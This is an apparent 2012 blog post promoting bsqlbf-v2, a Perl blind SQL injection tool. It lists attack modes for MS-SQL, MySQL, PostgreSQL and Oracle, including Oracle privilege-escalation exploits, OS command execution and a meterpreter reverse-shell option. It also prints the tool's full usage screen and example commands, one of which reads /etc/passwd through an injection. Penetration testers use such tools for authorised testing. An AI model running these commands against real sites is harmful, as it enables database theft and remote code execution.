<>
Wednesday, October 10, 2012
Home » pentest scripts » Perl » bsqlbf-v2 - Blind Sql Injection Brute Forcer version 2

bsqlbf-v2 - Blind Sql Injection Brute Forcer version 2


This is a modified version of 'bsqlbfv1.2-th.pl'. This perl script allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections. Databases supported:
0. MS-SQL
1. MySQL
2. PostgreSQL
3. Oracle
The tool supports 8 attack modes(-type switch):-
Type 0: Blind SQL Injection based on true and false conditions returned by back-end server
Type 1: Blind SQL Injection based on true and error(e.g syntax error) returned by back-end server.
Type 2: Blind SQL Injection in "order by" and "group by".
Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)
Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)
Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)
Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit
Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs
-cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe first
Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions
-cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe first
For Type 4(O.S code execution) the following methods are supported:
-stype: How you want to execute command:
SType 0 (default) is based on java..will NOT work against XE.
SType 1 is against oracle 9 with plsql_native_make_utility.
SType 2 is against oracle 10 with dbms_scheduler.
Download -
bsqlbf-v2-7.pl
Download other versions from here -
http://code.google.com/p/bsqlbf-v2/downloads/list
Usage example:
$./bsqlbf-v2.pl -url http://192.168.1.1/injection_string_post/1.asp?p=1 -method post -match true -database 0 -sql "select top 1 name from sysobjects where xtype='U'"
./bsqlbf-v2.3.pl -url http://192.168.1.1/injection_string_post/1.jsp?p=1 -type 4 -match "true" -cmd "ping notsosecure.com"
User Interface:
ubuntu@ubuntu:~$ ./bsqlbf-v2-3.pl 
 





 // Blind SQL injection brute forcer \\ 
  //originally written by...aramosf@514.es  \\ 
  
  // mofified by sid-at-notsosecure.com \\ 
  // http://www.notsosecure.com \\ 
  ---------------------usage:-------------------------------------------
 



Integer based Injection-->./bsqlbf-v2-3.pl - url http://www.host.com/path/script.php?foo=1000 (options)
  
 String Based Injection-->./bsqlbf-v2-3.pl - url http://www.host.com/path/script.php?foo=bar' (options)
   
  ------------------------------------options:--------------------------
  -sql:          valid SQL syntax to get; version(), database(),
                 (select  table_name from inforamtion_schema.tables limit 1 offset 0)
  -get:          If MySQL user is root, supply word readable file name
  -blind:        parameter to inject sql. Default is last value of url
  -match:        *RECOMMENDED* string to match in valid query, Default is auto
  -start:        if you know the beginning of the string, use it.
  -length:       maximum length of value. Default is 32.
  -time:         timer options:
         0:      dont wait. Default option.
         1:      wait 15 seconds
         2:      wait 5 minutes
 



 -type:         Type of injection:
         0:      Type 0 (default) is blind injection based on True and False responses
         1:      Type 1 is blind injection based on True and Error responses
         2:      Type 2 is injection in order by and group by 
         3:      Type 3 !!New!! is extracting data with SYS privileges (ORACLE dbms_export_extension exploit)
         4:      Type 4 !!New!! is O.S code execution (ORACLE dbms_export_extension exploit)
         5:      Type 5 !!New!! is reading files (ORACLE dbms_export_extension exploit, based on java)
 



 -file: File to read (default C:\boot.ini) 
 



 -stype:        How you want to execute command:
         0:      SType 0 (default) is based on java..will NOT work against XE
         1:      SType 1 is against oracle 9 with plsql_native_make_utility
         2:      SType 2 is against oracle 10 with dbms_scheduler 
  -database:     Backend database:
         0:      MS-SQL (Default)
         1:      MYSQL
         2:      POSTGRES
         3:      ORACLE
  -rtime:        wait random seconds, for example: "10-20".
  -method:       http method to use; get or post. Default is GET.
  -cmd:          command to execute(type 4 only). Default is "ping 127.0.0.1."
  -uagent:       http UserAgent header to use. Default is bsqlbf 2.3
  -ruagent:      file with random http UserAgent header to use.
  -cookie:       http cookie header to use
  -rproxy:       use random http proxy from file list.
  -proxy:        use proxy http. Syntax -proxy=http://proxy:port/  -proxy_user:   proxy http user
  -proxy_pass:   proxy http password
 



---------------------------- examples:-------------------------------
 bash# ./bsqlbf-v2-3.pl -url http://www.somehost.com/blah.php?u=5 -blind u -sql "select table_name from imformation_schema.tables limit 1 offset 0" -database 1 -type 1
 



bash# ./bsqlbf-v2-3.pl -url http://www.buggy.com/bug.php?r=514&p=foo' -method post -get "/etc/passwd" -match "foo"
Posted by at 8:33 AM
Information Security ,
Share:

1 comments:

  1. AnonymousJanuary 6, 2013 at 8:55 PM

    THanks - very nice script! Another helpful article on blind sql injection:

    http://www.programmerinterview.com/index.php/database-sql/blind-sql-injection/

    ReplyDelete
:) :)) ;(( :-) =)) ;( ;-( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ $-) (b) (f) x-) (k) (h) (c) cheer
Click to see the code!
To insert emoticon you must added at least one space before the code.

Subscribe to: Post Comments (Atom)
Welcome Back Visitor! Your Last Visit Was on Wed, Aug 6, 2025 09:13:34 PM
 
TOP